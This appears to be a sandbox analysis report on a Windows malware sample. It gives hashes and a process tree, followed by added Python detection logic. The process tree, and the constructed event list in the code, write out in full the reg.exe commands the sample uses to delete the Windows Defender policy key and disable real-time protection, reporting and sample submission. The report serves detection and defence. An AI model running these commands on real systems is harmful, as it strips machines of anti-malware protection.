Analysis

  • max time kernel
    143s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    29/05/2024, 22:37

General

  • Target

    82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe

  • Size

    90KB

  • MD5

    82308e107068f591cff8cd7e9280589a

  • SHA1

    eb4e8cf2ed682c7ffea028140501a3c3a603abe1

  • SHA256

    8dc666d31590e5edb83eb111aef386774e8c25102042a25965ead61b26fea0fd

  • SHA512

    b59d3226dcfb4bb296d13fed7e0c778754177fca8803d2b2def5c35400df4c1ff8c696ab1967c30c243b347380bd6f5c7e3ab4e969dd000d7fe59fc186571d5b

  • SSDEEP

    1536:AM7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIfOw+OF:ACFfHgTWmCRkGbKGLeNTBfO2

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings (3 TTPs, 10 IoCs)
  • Suspicious use of WriteProcessMemory (28 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\80A.tmp\81A.tmp\82B.bat C:\Users\Admin\AppData\Local\Temp\82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1820
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
        PID:1848
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
        PID:2928
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        3⤵
        PID:4008
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        3⤵
        PID:2140
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:8
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:1460
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:224
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:2260
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:3512
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        3⤵
        PID:924
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        3⤵
        PID:1776
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        3⤵
        PID:1752
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        3⤵
        PID:4180
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3936 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
    1⤵
    PID:440
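The whole payload of the dropped batch file is the run of reg.exe children above: it first deletes the Windows Defender policy key (discarding any hardening an administrator had set there), then recreates it with values that turn off anti-spyware and anti-virus, PUA blocking (MpEnablePus=0), every real-time protection component, enhanced notifications, block-at-first-seen and MAPS/SpyNet reporting, and set SubmitSamplesConsent to 2 (never send samples). Two caveats for a responder: Microsoft deprecated DisableAntiSpyware on Windows 10 client devices in 2020 and current Defender builds ignore it, and a host with Tamper Protection enabled ignores attempts to change these settings directly through the registry, so the main value of these commands is as a detection signal. What follows is an added example, not part of the sandbox report: Python detection logic that parses reg.exe command lines from process-creation records, matches them against exactly the writes listed above, and also flags the cmd.exe stage that runs a .bat from %TEMP%. The SAMPLE_EVENTS records are constructed from the report's process tree; PIDs 5001/5002 and the HKCU\Software\Contoso\Agent key are made up for the two benign cases.

```python
"""Flag the Defender policy tampering shown in the process tree (added example, not part
of the sandbox report). SAMPLE_EVENTS are constructed process-creation records (Sysmon
Event ID 1 / Security 4688 style) rebuilt from the report's command lines and PIDs,
plus two benign records that must not fire."""
import re

POLICY_ROOT = r"hklm\software\policies\microsoft\windows defender"

# (subkey under POLICY_ROOT, value name) -> data that weakens Defender: exactly the sample's writes, lower-cased.
DISABLING_VALUES = {
    ("", "disableantispyware"): "1",
    ("", "disableantivirus"): "1",
    ("mpengine", "mpenablepus"): "0",
    ("real-time protection", "disablebehaviormonitoring"): "1",
    ("real-time protection", "disableioavprotection"): "1",
    ("real-time protection", "disableonaccessprotection"): "1",
    ("real-time protection", "disablerealtimemonitoring"): "1",
    ("real-time protection", "disablescanonrealtimeenable"): "1",
    ("reporting", "disableenhancednotifications"): "1",
    ("spynet", "disableblockatfirstseen"): "1",
    ("spynet", "spynetreporting"): "0",
    ("spynet", "submitsamplesconsent"): "2",
}
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments intact."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]

def parse_reg(cmdline):
    """Parse `reg add|delete <key> [/v name] [/t type] [/d data] [/f]`; None if not reg add/delete."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or toks[0].lower().rsplit("\\", 1)[-1] not in ("reg", "reg.exe"):
        return None
    if toks[1].lower() not in ("add", "delete"):
        return None
    parsed = {"op": toks[1].lower(), "key": toks[2], "value": None, "type": None, "data": None}
    flags = {"/v": "value", "/t": "type", "/d": "data"}
    for flag, arg in zip(toks[3:], toks[4:]):  # each of these switches consumes the next token
        if flag.lower() in flags:
            parsed[flags[flag.lower()]] = arg
    return parsed

def classify_reg(cmdline):
    """Say why a reg command weakens Defender policy, or return None if it does not."""
    p = parse_reg(cmdline)
    if p is None:
        return None
    key = p["key"].lower().replace("hkey_local_machine", "hklm")
    if key != POLICY_ROOT and not key.startswith(POLICY_ROOT + "\\"):
        return None
    subkey = key[len(POLICY_ROOT):].lstrip("\\")
    path = "\\".join(x for x in (subkey, p["value"]) if x)
    if p["op"] == "delete":  # wiping the key discards admin-set hardening before the sample's own writes
        return "deletes Defender policy " + (path or "root key")
    want = DISABLING_VALUES.get((subkey, (p["value"] or "").lower()))
    if want is not None and (p["data"] or "").lower() == want:
        return f"sets {path}={p['data']}"
    return None  # unrelated value, or a setting being turned back on

def scan_events(events):
    """Return (pid, reason) for each (pid, image, command_line) record that fires."""
    hits = []
    for pid, image, cmd in events:
        exe = image.lower().rsplit("\\", 1)[-1]
        if exe == "reg.exe" and (why := classify_reg(cmd)):
            hits.append((pid, why))
        elif exe == "cmd.exe" and re.search(r"\\appdata\\local\\temp\\[^\s\"]*\.bat\b", cmd, re.I):
            hits.append((pid, "runs a batch file dropped in %TEMP%"))  # the stage that launches the reg writes
    return hits

_ROOT, _REG = r"HKLM\Software\Policies\Microsoft\Windows Defender", r"C:\Windows\system32\reg.exe"
def _reg_add(subkey, name, data):
    """Rebuild the exact `reg add` syntax the sample's batch file uses."""
    key = _ROOT + ("\\" + subkey if subkey else "")
    return f'reg add "{key}" /v "{name}" /t REG_DWORD /d "{data}" /f'

SAMPLE_EVENTS = [  # constructed from the report's process tree: (PID, image, command line)
    (1820, r"C:\Windows\system32\cmd.exe", r'"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp'
     r'\80A.tmp\81A.tmp\82B.bat C:\Users\Admin\AppData\Local\Temp\82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe"'),
    (1848, _REG, f'reg delete "{_ROOT}" /f'),
    (2928, _REG, _reg_add("", "DisableAntiSpyware", "1")),
    (4008, _REG, _reg_add("", "DisableAntiVirus", "1")),
    (2140, _REG, _reg_add("MpEngine", "MpEnablePus", "0")),
    (8, _REG, _reg_add("Real-Time Protection", "DisableBehaviorMonitoring", "1")),
    (1460, _REG, _reg_add("Real-Time Protection", "DisableIOAVProtection", "1")),
    (224, _REG, _reg_add("Real-Time Protection", "DisableOnAccessProtection", "1")),
    (2260, _REG, _reg_add("Real-Time Protection", "DisableRealtimeMonitoring", "1")),
    (3512, _REG, _reg_add("Real-Time Protection", "DisableScanOnRealtimeEnable", "1")),
    (924, _REG, _reg_add("Reporting", "DisableEnhancedNotifications", "1")),
    (1776, _REG, _reg_add("SpyNet", "DisableBlockAtFirstSeen", "1")),
    (1752, _REG, _reg_add("SpyNet", "SpynetReporting", "0")),
    (4180, _REG, _reg_add("SpyNet", "SubmitSamplesConsent", "2")),
    # Two made-up benign records: an unrelated key, and an admin turning real-time monitoring back on.
    (5001, _REG, r'reg add "HKCU\Software\Contoso\Agent" /v "Installed" /t REG_DWORD /d "1" /f'),
    (5002, _REG, _reg_add("Real-Time Protection", "DisableRealtimeMonitoring", "0")),
]

if __name__ == "__main__":
    for pid, why in scan_events(SAMPLE_EVENTS):
        print(pid, why)
```

Matching on the parsed key, value name and data rather than on raw substrings keeps the rule robust to quoting, casing and HKEY_LOCAL_MACHINE versus HKLM, and it stays silent when the same value is written with the opposite data, which is what an administrator re-enabling protection looks like. Treating the `reg delete` of the policy root as a finding in its own right matters because that step alone undoes any hardening an organisation pushed through policy, even if the later writes were blocked.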

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\80A.tmp\81A.tmp\82B.bat

    Filesize
    1KB

    MD5
    509170ad1804d3092fa6c5cf530e017f

    SHA1
    3fb5b0dee2231ef6e7d0f71b6af5b298f109c2c4

    SHA256
    7a1f7876c4cdbc2010f08f143347f6c037c558ff57a3209cb5a56644e385280d

    SHA512
    ef12b29934cb19fe87e7014f6cbd22e23c1b77f3841ecd06b980e72d6c067f9b1a32524b5985c70f1537cecbad8286a73925de3b87e396cf19bb6580e828ee58